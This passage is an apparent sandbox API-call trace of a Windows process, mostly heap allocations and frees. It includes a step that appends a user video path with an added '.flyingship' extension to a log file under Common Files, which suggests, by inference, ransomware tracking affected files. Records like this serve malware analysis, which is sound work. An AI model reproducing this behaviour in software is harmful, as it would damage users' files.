(HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0198.988] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0198.988] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.988] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.989] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0198.989] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.989] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0198.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.990] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0198.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0198.990] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x120) returned 0x907778 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.991] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.991] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.991] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0198.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0198.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0198.992] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0198.992] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3da4, lpOverlapped=0x0) returned 1 [0198.992] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0198.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3da4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0198.992] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0198.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0198.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0198.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.flyingship.mkv\r\n", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0198.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4a) returned 0x9238c0 [0198.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.flyingship.mkv\r\n", cchWideChar=74, lpMultiByteStr=0x9238c0, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\5sGE4.flyingship.mkv\r\n", lpUsedDefaultChar=0x0) returned 74 [0198.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0198.993] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0198.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0198.993] WriteFile (in: hFile=0x158, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x49, lpOverlapped=0x0) returned 1 [0198.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0198.993] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0198.993] CloseHandle (hObject=0x158) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0198.994] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.995] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0198.995] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.995] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.996] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0198.996] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.996] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.996] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.996] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4c8 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0198.996] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0198.997] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0198.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0198.997] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0198.997] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0198.997] 